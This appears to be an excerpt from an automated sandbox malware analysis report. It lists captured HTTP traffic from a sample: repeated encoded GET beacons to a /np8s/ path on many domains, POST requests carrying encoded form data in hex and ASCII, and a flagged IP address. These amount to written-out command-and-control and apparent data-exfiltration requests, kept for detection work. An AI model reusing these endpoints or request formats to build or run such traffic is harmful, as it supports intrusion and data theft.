Source: global traffic HTTP traffic detected: GET /np8s/?U48h=d/nstEfJj6EqHIao63FJ0s9GuqA95KQHoqtaktjr9/p2jHwlkCQ3yhCEo2yEkzAcnCwi&m88hS=6ld8i2BhSR2pvHw HTTP/1.1Host: www.jlbwaterdamagerepairseattle.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?U48h=E3oeYQ/4MqgKR0uZQviaDeSIZFjg9uLLieRcSmG+YXW0WXU/K8viVoPbPV+txMCieWz0&m88hS=6ld8i2BhSR2pvHw HTTP/1.1Host: www.nachuejooj07.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?U48h=1Nsioc0lpQImfCEv7q3CJRvbkNIovvFEONaUY8zyneWF7ypKO8GgemnIz8ljrbRyzkwj&m88hS=6ld8i2BhSR2pvHw HTTP/1.1Host: www.xn--wsthof-camping-gsb.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?U48h=N6XRxtM6F1nBVZRwu48YOgJ13F0eVAmeAwT+lah6Tiq2+v96MM9EXT3L0sCJR4qYezv9&m88hS=6ld8i2BhSR2pvHw HTTP/1.1Host: www.brandingaloha.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?U48h=SjFSW0qH8X1Gu/+4r88YNPSLQa2KKx1h4LPt291Cc0nRXdmgbio7b0swgPTE4uOj94VU&m88hS=6ld8i2BhSR2pvHw HTTP/1.1Host: www.brawlhallacodestore.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?U48h=vlrq3Iq6CNBS64Mt3AOFKZFqCoQQX/EcbdCgZyJL/t2S6EN96XJkdyy29bgYyDpdikhs&m88hS=6ld8i2BhSR2pvHw HTTP/1.1Host: www.kishanshree.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?U48h=VAwngi5WtAVjDckXiPDKxPPVGnJBDj1vDFh4gmlmfJouKpIa6u8IzCyY+5EvW03qMChn&m88hS=6ld8i2BhSR2pvHw HTTP/1.1Host: www.littlebeartreeservices.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?U48h=VOk/KoOKPmyFTHQXWsNAO627WiKHMN6hKQrMVwJFQe1euvxAvAuscpxAvLs3P2LowQm4&m88hS=6ld8i2BhSR2pvHw HTTP/1.1Host: www.sekolahkejepang.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?U48h=0fJNa1pbsGGBLLIqJIKrQqKQ2B2XPA1kKZrGWkGMUEET6sTbN1/jKODkGFdHTU1h4cme&m88hS=6ld8i2BhSR2pvHw HTTP/1.1Host: www.68chengxinle.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?U48h=+1vSQSU4VFPBNkL8EMH3DU8MRg7YeuqbcMOylP3M0ivye7s4zRc3erRZEPodkGcNW4yt&m88hS=6ld8i2BhSR2pvHw HTTP/1.1Host: www.topings33.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?U48h=8LogcizAnzdlGnQxjqmkKg1ptkiP35PZAMc6f9pH/hY/tlO3rV33gx6kBCmuDEKP6O8z&m88hS=6ld8i2BhSR2pvHw HTTP/1.1Host: www.losangelesrentalz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?U48h=25I4eedf3LYXj+mrZ2jI6olVDZbg0jTgzRvorLdGhmBPpJDDPx12pMPLDebssumACK1+&m88hS=6ld8i2BhSR2pvHw HTTP/1.1Host: www.shcylzc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?2dEPbf=4hfxZPP84Ri&U48h=vppS5AedQQffRlEeclZ7feN7VEirdPdpHk1lk+jbM2J+jzoAXquLk4CVs2mn5+uwvQPb HTTP/1.1Host: www.medyumgalip.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?U48h=Zh0bV6ZfyWWsx8NH2/NEuPodWNfo5oM06Wd1YTR0VEh7Ou4O0zYflewlPsoSmCQ+q/UO&2dEPbf=4hfxZPP84Ri HTTP/1.1Host: www.udrivestorage.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?2dEPbf=4hfxZPP84Ri&U48h=ki1nHMJkMrR7eeT2cjvvxShsxzdLToZEWe0Y/Ruw5T1OY282Gl8t0P/h1biOuIyNKIHU HTTP/1.1Host: www.lazarusnatura.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?2dEPbf=4hfxZPP84Ri&U48h=Gfubwqqm8fAzC8DVdPlLHb5iW2l0adCKSAamgQxpd8VH998tJyiM6MNptdcvbuHHsRLz HTTP/1.1Host: www.salondutaxi.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?U48h=O5u6OlqxnDtTF3riQ4xVZIWxoHxK/fTzbXBC76K0hST926FmxCw4JGrgecy53rLpUaVG&2dEPbf=4hfxZPP84Ri HTTP/1.1Host: www.interlink-travel.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?2dEPbf=4hfxZPP84Ri&U48h=vlrq3Iq6CNBS64Mt3AOFKZFqCoQQX/EcbdCgZyJL/t2S6EN96XJkdyy29bgYyDpdikhs HTTP/1.1Host: www.kishanshree.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?U48h=vlrq3Iq6CNBS64Mt3AOFKZFqCoQQX/EcbdCgZyJL/t2S6EN96XJkdyy29bgYyDpdikhs&m88hS=6ld8i2BhSR2pvHw HTTP/1.1Host: www.kishanshree.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?U48h=VAwngi5WtAVjDckXiPDKxPPVGnJBDj1vDFh4gmlmfJouKpIa6u8IzCyY+5EvW03qMChn&m88hS=6ld8i2BhSR2pvHw HTTP/1.1Host: www.littlebeartreeservices.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?U48h=VOk/KoOKPmyFTHQXWsNAO627WiKHMN6hKQrMVwJFQe1euvxAvAuscpxAvLs3P2LowQm4&m88hS=6ld8i2BhSR2pvHw HTTP/1.1Host: www.sekolahkejepang.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?U48h=0fJNa1pbsGGBLLIqJIKrQqKQ2B2XPA1kKZrGWkGMUEET6sTbN1/jKODkGFdHTU1h4cme&m88hS=6ld8i2BhSR2pvHw HTTP/1.1Host: www.68chengxinle.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?U48h=+1vSQSU4VFPBNkL8EMH3DU8MRg7YeuqbcMOylP3M0ivye7s4zRc3erRZEPodkGcNW4yt&m88hS=6ld8i2BhSR2pvHw HTTP/1.1Host: www.topings33.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?U48h=8LogcizAnzdlGnQxjqmkKg1ptkiP35PZAMc6f9pH/hY/tlO3rV33gx6kBCmuDEKP6O8z&m88hS=6ld8i2BhSR2pvHw HTTP/1.1Host: www.losangelesrentalz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?U48h=25I4eedf3LYXj+mrZ2jI6olVDZbg0jTgzRvorLdGhmBPpJDDPx12pMPLDebssumACK1+&m88hS=6ld8i2BhSR2pvHw HTTP/1.1Host: www.shcylzc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 160.153.136.3 160.153.136.3
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.losangelesrentalz.comConnection: closeContent-Length: 410Cache-Control: no-cacheOrigin: http://www.losangelesrentalz.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.losangelesrentalz.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 55 34 38 68 3d 7a 4a 63 61 43 47 62 6c 68 68 35 74 66 6c 78 4d 32 61 6a 63 4c 58 77 50 6e 6d 7e 53 68 5a 4c 48 61 4c 4e 48 63 72 64 51 36 30 59 2d 6a 32 61 76 6a 32 65 4e 6c 33 43 39 56 54 6a 65 65 58 61 4b 32 4f 78 6b 28 5a 7e 32 6d 68 36 6d 55 6d 52 70 43 79 76 78 71 36 69 72 56 69 4e 57 4b 69 36 38 4f 4a 44 45 6c 53 71 67 28 58 37 50 71 54 35 5f 62 64 44 4c 6a 61 46 6b 50 49 35 33 37 4f 52 54 57 4b 53 6a 72 4f 4a 37 71 70 56 43 61 6d 52 39 77 66 62 58 6c 43 69 65 54 2d 50 6f 65 43 71 66 7a 57 35 4c 39 30 69 76 65 73 7a 44 43 78 64 47 59 64 4a 32 50 57 42 47 70 5a 4e 66 6e 55 32 33 61 76 65 46 6a 7a 42 50 48 30 78 66 47 34 53 7a 56 32 52 79 72 66 6d 43 31 37 68 6f 6d 36 4a 49 59 64 31 33 42 4d 33 49 78 77 45 41 58 70 48 57 67 50 74 6c 77 65 75 42 70 4f 4e 6d 38 62 5a 6c 58 52 79 45 71 64 54 46 49 52 65 35 67 4c 58 73 50 33 39 52 73 49 6a 44 74 4a 68 48 4c 50 48 55 28 52 68 4d 55 75 59 72 35 67 6d 74 6f 44 48 7a 51 43 50 52 4b 55 36 35 4d 56 67 4a 75 63 6b 6c 4d 6c 54 6b 64 66 37 4a 6c 45 62 52 6a 78 44 6f 7e 56 35 70 77 43 45 34 64 38 32 4c 50 6d 37 63 72 34 4a 69 47 57 78 56 6b 46 37 46 41 5f 53 54 28 55 28 50 36 78 4d 54 73 35 43 4a 49 75 58 33 67 4d 73 71 70 56 41 4a 31 42 72 76 30 34 7e 4d 41 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: U48h=zJcaCGblhh5tflxM2ajcLXwPnm~ShZLHaLNHcrdQ60Y-j2avj2eNl3C9VTjeeXaK2Oxk(Z~2mh6mUmRpCyvxq6irViNWKi68OJDElSqg(X7PqT5_bdDLjaFkPI537ORTWKSjrOJ7qpVCamR9wfbXlCieT-PoeCqfzW5L90iveszDCxdGYdJ2PWBGpZNfnU23aveFjzBPH0xfG4SzV2RyrfmC17hom6JIYd13BM3IxwEAXpHWgPtlweuBpONm8bZlXRyEqdTFIRe5gLXsP39RsIjDtJhHLPHU(RhMUuYr5gmtoDHzQCPRKU65MVgJucklMlTkdf7JlEbRjxDo~V5pwCE4d82LPm7cr4JiGWxVkF7FA_ST(U(P6xMTs5CJIuX3gMsqpVAJ1Brv04~MAw).
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.losangelesrentalz.comConnection: closeContent-Length: 36478Cache-Control: no-cacheOrigin: http://www.losangelesrentalz.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.losangelesrentalz.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 55 34 38 68 3d 7a 4a 63 61 43 43 62 4a 73 77 46 30 52 56 39 6e 79 73 6e 49 54 58 41 4e 6c 57 72 44 28 74 61 64 64 36 63 2d 45 50 56 68 37 78 31 5f 6e 47 57 4f 6e 33 4b 56 6c 32 54 32 64 41 48 42 4a 6e 58 34 32 4f 70 47 28 5a 79 32 6e 69 4b 74 58 46 70 50 46 51 58 79 74 61 69 54 55 69 4e 44 4f 6a 6d 42 4f 4a 47 30 6c 57 79 77 28 6e 48 50 34 68 78 5f 64 65 71 46 70 61 46 59 48 6f 4a 72 6c 2d 64 6b 57 4f 47 72 72 50 31 37 71 5a 4a 43 61 46 5a 38 6e 4d 7a 55 6f 79 69 62 57 2d 50 78 4c 53 76 75 7a 57 39 74 39 32 47 76 65 65 58 44 42 42 39 47 64 71 56 70 58 32 42 4a 37 70 4e 59 71 30 36 71 61 76 79 4a 6a 33 78 35 53 52 78 66 47 49 53 79 53 6b 77 53 36 34 79 52 36 62 56 50 6d 36 46 68 59 73 70 52 42 4e 4b 38 68 77 70 6c 59 71 7e 65 67 4d 42 44 6a 75 75 46 78 2d 4e 32 38 62 5a 46 58 52 79 6d 71 64 6a 46 49 53 75 35 68 70 66 73 4a 57 39 53 6f 6f 6a 4d 6d 70 68 66 46 76 4c 47 28 52 59 4a 55 75 78 6a 35 33 47 74 70 69 33 7a 58 32 62 53 52 6b 36 46 54 46 68 64 33 73 6b 71 4d 6c 54 38 64 65 36 4d 6c 33 76 52 67 45 37 6f 35 77 74 70 79 79 45 34 42 73 32 4a 57 32 33 79 72 37 35 6d 47 58 41 67 78 6d 58 46 5a 4e 61 54 78 56 28 50 35 42 4d 54 6a 5a 43 62 47 73 71 76 68 5f 30 5f 73 6e 41 6f 28 67 71 41 77 63 58 32 43 5a 78 63 43 2d 46 66 49 47 32 72 46 34 64 64 32 6a 76 46 4c 73 41 65 47 35 65 5f 59 71 49 5f 72 42 72 32 66 66 6b 6f 58 50 78 55 4d 63 46 55 6a 62 37 2d 55 76 5a 75 4e 47 55 62 4a 58 28 52 55 65 6b 72 6b 4a 68 65 50 66 61 78 7a 65 38 6c 7a 32 4a 46 62 4e 31 45 62 6c 77 68 49 74 66 4b 38 70 73 56 38 73 69 64 79 51 4b 58 6f 69 6c 4d 39 4d 69 50 70 4a 47 57 69 52 39 38 67 6a 73 64 56 35 28 65 62 62 58 75 44 51 30 2d 63 42 43 2d 71 52 55 57 62 4e 67 32 51 63 51 44 68 46 64 6e 49 72 6d 58 6e 4e 73 38 35 49 48 44 74 46 4c 31 56 6e 4b 32 49 62 6a 47 77 64 6a 50 4a 2d 31 2d 31 6a 72 77 63 47 7e 45 49 59 28 74 30 33 46 4b 68 32 45 39 42 2d 6f 77 72 57 35 52 65 74 69 76 59 4a 76 6e 58 77 72 4a 64 35 72 48 46 64 75 46 48 50 66 49 6f 33 48 48 4d 64 7a 30 78 67 79 49 67 34 32 33 55 49 66 33 48 2d 72 41 68 62 6f 59 78 30 71 65 53 58 36 5f 41 33 49 2d 77 73 70 74 4c 42 41 63 4a 64 33 38 56 77 63 70 50 47 55 6c 6b 58 51 6f 43 46 4c 33 39 54 6a 66 70 45 6e 53 45 4b 73 5f 48 49 47 61 44 5a 4d 39 78 37 66 4c 58 5f 43 4f 69 6a 56 6b 78 65 7e 4b 4a 6c 35 52 6e 36 63 4e 4b 4e 62 41 61 38 66 63 47 74 39 56 42 75 68 50 6b 4c 30 64 72 6d 4b 4f 7a 67 69 58 56 42 56 50 41 34 72 42 39 42 30 33 73 47 47 5a 36 52 6e 74 47 52 6a 53 51 6d 39 74 4b 71 65 6f 38 63 37 41 64 34 4f 7a 5a 4d 58 50 59 36 7a 77 6f 2d 57 78 69 6e 56 55 37 69 6d 53 32 49 47 4c 35 47 62 55
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.shcylzc.comConnection: closeContent-Length: 410Cache-Control: no-cacheOrigin: http://www.shcylzc.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.shcylzc.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 55 34 38 68 3d 35 37 38 43 41 37 64 6f 71 73 77 42 30 65 58 78 49 41 71 33 6c 4d 56 78 56 71 76 4e 30 54 4c 59 33 6d 65 37 7a 36 42 34 6d 46 4a 4c 68 34 50 2d 4a 68 45 6e 37 35 7e 32 5a 75 6a 48 67 38 61 4b 63 59 67 32 44 37 55 41 57 5a 74 70 31 79 56 53 65 68 62 54 47 71 46 36 6a 63 6c 79 37 72 66 33 78 6a 45 59 33 51 71 30 65 61 49 59 31 68 43 71 64 4f 67 5f 62 52 71 32 63 54 41 4f 4c 63 58 66 6a 79 70 56 68 45 33 6b 6a 71 75 51 42 72 36 39 69 56 4f 4e 66 49 69 35 46 70 69 33 50 65 37 7a 48 34 53 32 33 33 77 48 4d 2d 78 55 72 47 4c 2d 72 48 45 74 77 43 53 4a 56 67 62 56 62 5f 59 42 74 65 57 50 44 37 6d 46 4f 4a 73 6f 4f 64 6c 76 58 68 31 6e 6c 4d 4b 62 39 6d 58 61 66 72 52 68 50 69 50 46 6a 4b 36 61 6e 5a 37 6a 66 33 65 66 62 56 57 76 50 75 32 6d 31 38 34 6f 67 42 45 42 72 4c 36 30 70 62 51 69 6a 58 66 73 44 70 47 51 52 33 67 77 41 6f 51 4c 28 42 61 59 42 53 65 41 63 67 41 6f 33 75 36 6e 46 52 7e 6e 6b 4c 56 54 31 37 76 38 6b 4b 45 4d 34 77 39 54 35 4c 68 42 67 79 44 58 43 6d 36 66 49 72 44 64 31 7a 71 7a 68 61 41 31 39 52 78 54 62 41 54 5f 52 62 4d 53 51 5f 49 36 6a 77 70 6c 56 57 39 76 70 75 49 69 72 36 74 37 56 4a 59 74 72 2d 37 56 50 68 4c 35 31 52 5a 71 38 62 28 4e 5a 44 68 52 71 6e 54 52 4e 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: U48h=578CA7doqswB0eXxIAq3lMVxVqvN0TLY3me7z6B4mFJLh4P-JhEn75~2ZujHg8aKcYg2D7UAWZtp1yVSehbTGqF6jcly7rf3xjEY3Qq0eaIY1hCqdOg_bRq2cTAOLcXfjypVhE3kjquQBr69iVONfIi5Fpi3Pe7zH4S233wHM-xUrGL-rHEtwCSJVgbVb_YBteWPD7mFOJsoOdlvXh1nlMKb9mXafrRhPiPFjK6anZ7jf3efbVWvPu2m184ogBEBrL60pbQijXfsDpGQR3gwAoQL(BaYBSeAcgAo3u6nFR~nkLVT17v8kKEM4w9T5LhBgyDXCm6fIrDd1zqzhaA19RxTbAT_RbMSQ_I6jwplVW9vpuIir6t7VJYtr-7VPhL51RZq8b(NZDhRqnTRNQ).
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.shcylzc.comConnection: closeContent-Length: 36478Cache-Control: no-cacheOrigin: http://www.shcylzc.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.shcylzc.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 55 34 38 68 3d 35 37 38 43 41 36 4d 72 31 73 55 45 33 4f 61 68 62 69 71 6a 74 64 6c 33 54 4b 72 43 37 7a 6e 4c 67 48 4f 33 39 62 77 65 6e 45 77 4d 6b 49 53 59 4e 69 30 76 37 39 32 50 44 73 33 44 6e 63 57 56 63 5a 49 49 44 37 41 41 58 61 38 30 79 52 64 72 5a 48 76 51 42 4b 45 66 67 63 6c 76 77 4a 72 65 78 6a 42 5f 33 51 69 43 64 70 73 59 6e 33 47 71 62 4e 59 6c 46 42 71 77 64 54 51 43 50 63 71 67 6a 78 59 4b 68 42 50 6b 6a 61 79 51 41 49 53 36 70 30 4f 53 62 59 6a 7a 41 70 69 75 61 4f 28 42 48 34 6e 56 33 32 4d 48 4d 4c 68 55 71 53 37 2d 28 6b 63 75 6f 69 53 41 52 67 62 53 52 66 56 48 74 64 6a 64 44 2d 47 37 4e 38 73 6f 50 74 6c 71 64 51 77 61 79 76 54 62 28 6d 6a 74 66 72 74 45 4f 7a 6a 64 6a 49 50 4c 77 36 79 62 51 31 32 35 62 58 37 79 4a 4f 32 69 39 63 34 76 67 42 45 48 72 4c 37 58 70 62 41 69 6a 55 28 73 44 4e 75 51 59 7a 38 7a 4c 6f 51 4f 77 68 61 36 63 43 53 4b 63 68 70 76 33 75 43 4a 51 77 71 6e 6c 71 6c 54 79 4b 75 71 72 71 45 56 38 77 39 61 33 72 68 34 67 79 44 68 43 6e 36 50 49 34 33 64 7a 69 71 7a 6d 38 38 31 6d 42 78 54 51 67 54 39 4b 4c 42 4b 51 2d 73 2d 6a 31 74 66 57 68 46 76 75 39 77 69 72 62 74 37 55 5a 59 74 7e 75 36 41 48 43 6a 38 35 52 59 66 35 4b 54 70 53 6d 41 47 67 6c 4b 49 58 50 72 34 46 6b 42 48 4f 4c 44 6e 4e 73 49 66 51 55 35 52 44 4d 6a 61 28 50 72 47 51 33 6c 43 34 42 69 39 42 50 78 41 33 39 62 43 6b 51 49 4a 42 74 4f 52 55 41 31 75 68 74 6a 78 6d 35 52 65 46 55 7e 67 42 6f 4e 6f 44 65 6b 79 78 6f 7e 35 32 68 42 6f 70 33 62 6b 57 5a 63 34 4d 64 50 65 62 50 4f 6e 72 47 43 56 78 61 6b 47 6f 51 32 6e 79 5a 48 49 53 65 39 4e 53 4b 7e 6f 67 31 44 57 6b 33 34 76 58 43 74 6d 6b 5a 53 7a 33 6b 73 75 55 72 31 66 76 47 69 78 37 50 4f 43 65 34 70 63 52 72 6c 4d 75 32 4e 73 38 57 5a 44 4c 4a 5a 30 39 79 34 74 74 67 4a 5f 69 4e 54 6b 55 38 4e 34 6d 31 75 4e 54 48 59 68 66 30 36 4d 76 4d 48 33 49 36 44 36 72 48 42 39 6a 4d 76 48 78 7a 64 4d 74 35 6d 79 78 37 68 43 55 74 64 50 55 38 52 4e 47 78 73 44 75 45 41 70 51 50 77 72 75 48 41 31 70 76 58 66 4d 36 65 4d 42 79 45 49 64 42 42 64 73 47 4e 6d 76 63 4f 45 45 71 56 49 6e 57 68 6e 63 4c 31 53 67 72 70 68 69 6f 28 34 45 33 54 55 41 52 69 30 64 6d 75 4c 78 74 4b 55 70 61 4b 5f 38 4c 4f 6a 73 30 50 75 45 74 43 50 6d 4d 6a 66 49 31 34 33 33 73 39 52 33 50 58 33 63 30 78 59 43 36 78 68 63 44 45 6b 6d 41 6c 34 38 4e 7e 46 5a 2d 66 69 76 77 64 4c 62 73 50 2d 38 61 48 4a 65 6c 52 44 46 37 38 56 77 41 55 79 41 30 76 4f 51 74 39 56 34 4f 42 6e 75 71 28 42 75 4c 33 37 6f 65 33 64 72 34 39 61 70 67 4f 4c 6b 72 44 45 76 4d 46 4f 58 42 59 71 66 33 69 38 43 50 51 49 44 49 78 50 6a 42 54 62 6e 41 78 4c 36 4f
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.udrivestorage.comConnection: closeContent-Length: 410Cache-Control: no-cacheOrigin: http://www.udrivestorage.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.udrivestorage.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 55 34 38 68 3d 57 6a 41 68 4c 64 45 74 7a 45 47 76 75 38 73 64 32 70 49 50 74 76 6b 5f 56 5a 54 69 7e 72 45 41 6f 79 51 58 43 6a 52 34 54 6b 68 67 45 4e 6f 76 30 54 39 6d 6e 49 74 41 5a 38 6f 48 6a 57 78 54 73 4f 39 6c 38 4d 4f 4d 6e 4b 50 49 4c 57 6e 76 77 77 53 59 41 6f 4e 37 66 55 63 6b 35 43 50 58 61 5f 76 7a 63 55 7a 52 41 72 72 55 7e 51 33 53 61 43 4c 6f 56 77 79 6a 43 31 74 69 6b 76 6b 6d 28 7a 73 54 28 4c 72 62 6a 61 46 44 55 38 73 41 47 42 35 78 30 52 46 77 46 6b 34 33 4b 59 68 72 36 72 70 63 61 7a 59 52 5a 43 70 34 31 78 58 43 44 74 6f 59 73 45 4a 6a 28 37 51 69 71 71 79 4f 44 75 32 41 37 55 6b 4a 4e 50 31 34 38 36 31 48 64 63 50 74 75 2d 43 4f 47 54 38 64 54 61 4e 4d 47 58 5a 75 6e 5a 4c 38 4a 75 44 70 79 35 45 4e 73 77 4a 36 47 4f 69 7a 74 63 71 32 63 6a 36 35 4c 53 79 58 28 79 7a 70 6c 63 52 6a 4a 45 56 47 47 35 64 5f 47 66 50 71 73 79 37 31 78 6e 32 72 41 5a 7e 78 39 77 6f 41 63 65 76 70 74 69 47 55 5a 75 56 2d 56 53 4a 5f 63 79 64 42 66 5f 45 76 68 4d 70 43 7e 33 28 32 51 53 73 52 66 4f 41 6d 5a 69 43 53 6b 6a 77 54 69 34 38 45 34 6b 57 68 4b 62 39 4c 55 69 52 78 53 64 75 2d 71 6f 62 59 38 64 35 6c 6e 58 4b 46 63 59 79 55 72 6e 66 64 47 7a 32 67 78 54 37 4b 7a 68 7e 54 43 4c 77 49 46 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: U48h=WjAhLdEtzEGvu8sd2pIPtvk_VZTi~rEAoyQXCjR4TkhgENov0T9mnItAZ8oHjWxTsO9l8MOMnKPILWnvwwSYAoN7fUck5CPXa_vzcUzRArrU~Q3SaCLoVwyjC1tikvkm(zsT(LrbjaFDU8sAGB5x0RFwFk43KYhr6rpcazYRZCp41xXCDtoYsEJj(7QiqqyODu2A7UkJNP14861HdcPtu-COGT8dTaNMGXZunZL8JuDpy5ENswJ6GOiztcq2cj65LSyX(yzplcRjJEVGG5d_GfPqsy71xn2rAZ~x9woAcevptiGUZuV-VSJ_cydBf_EvhMpC~3(2QSsRfOAmZiCSkjwTi48E4kWhKb9LUiRxSdu-qobY8d5lnXKFcYyUrnfdGz2gxT7Kzh~TCLwIFQ).
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.udrivestorage.comConnection: closeContent-Length: 36478Cache-Control: no-cacheOrigin: http://www.udrivestorage.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.udrivestorage.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 55 34 38 68 3d 57 6a 41 68 4c 63 35 32 75 6e 43 4d 71 63 68 4e 33 5f 45 68 31 4c 67 35 5a 49 44 39 30 4a 41 6c 73 41 6b 70 64 79 68 76 53 6d 77 39 41 39 30 4f 6c 67 64 2d 6e 4a 64 70 66 4a 77 44 6e 32 31 53 73 50 56 4c 38 4e 36 4d 6d 4d 32 4e 4c 32 58 46 78 54 36 66 4e 6f 4e 48 4e 45 64 36 6f 57 76 36 61 2d 62 4e 63 55 37 42 42 5a 7a 55 28 7a 50 53 4e 56 6e 5a 66 77 79 68 63 6c 39 45 71 50 59 42 28 7a 6b 4c 28 4a 76 62 69 71 4a 44 57 63 38 44 41 41 35 75 39 68 46 78 50 45 34 69 54 49 74 34 36 72 73 73 61 79 6b 52 59 77 4e 34 76 46 6a 43 58 4b 45 5a 6e 55 4a 6d 6f 4c 51 6c 67 4b 7e 66 44 75 71 63 37 56 52 38 4e 62 68 34 39 4b 31 38 52 76 76 54 28 35 58 4f 4c 7a 35 39 54 61 4a 70 46 47 56 32 6e 59 6e 51 4f 63 62 53 75 4c 73 33 73 7a 6c 63 44 75 69 5f 31 4d 71 39 63 6a 36 56 4c 53 7a 47 28 78 72 70 6c 66 42 6a 49 6d 74 47 50 37 31 38 59 76 50 56 6c 53 37 74 31 6e 36 35 41 5a 32 62 39 78 41 71 63 73 44 70 72 44 32 55 65 66 56 5f 63 79 4a 35 59 79 64 69 57 66 45 67 68 4d 70 67 7e 79 48 6d 51 68 59 52 65 61 55 6d 65 45 32 53 6c 54 77 54 6e 34 38 47 7a 45 61 78 4b 62 31 50 55 6e 30 4d 54 71 4f 2d 71 39 58 59 38 5f 52 6c 30 33 4b 46 46 49 79 44 6e 6c 61 4f 44 6a 69 32 35 51 48 4e 32 77 28 43 57 70 78 47 59 74 53 58 32 39 64 64 35 30 6a 6d 36 47 53 74 66 75 6f 42 4d 4a 70 4c 61 71 71 57 77 54 6a 57 63 74 41 36 68 62 7e 47 34 53 28 73 57 45 66 52 53 4e 77 35 46 7a 70 62 6b 6f 72 6c 6b 36 42 36 35 5f 4e 6b 54 79 4e 6c 75 37 67 33 79 44 7e 4f 67 6f 41 44 77 4f 62 36 39 37 5a 2d 32 62 4e 35 69 62 49 54 65 4f 72 5f 4a 57 4f 42 31 4f 31 69 34 53 58 74 76 32 63 42 51 72 42 41 41 38 33 69 4c 7a 42 33 39 68 67 73 36 34 28 75 57 4c 4a 59 6d 45 75 34 75 30 45 6a 32 4f 37 41 43 76 45 61 6f 46 72 32 6a 66 46 78 7a 43 31 34 65 38 53 59 42 4c 6a 4c 64 77 4c 51 55 4c 76 53 32 6c 4a 6c 59 61 30 4f 56 62 7e 33 46 35 62 51 73 47 31 62 41 5a 76 59 75 38 72 66 50 76 4c 73 7a 6e 71 74 4b 36 51 4e 46 37 51 79 33 42 4c 62 51 52 36 34 4f 51 4a 33 59 2d 59 65 51 69 4d 58 30 36 65 54 34 30 69 78 71 4f 41 75 64 38 41 44 58 57 56 71 38 48 6f 53 71 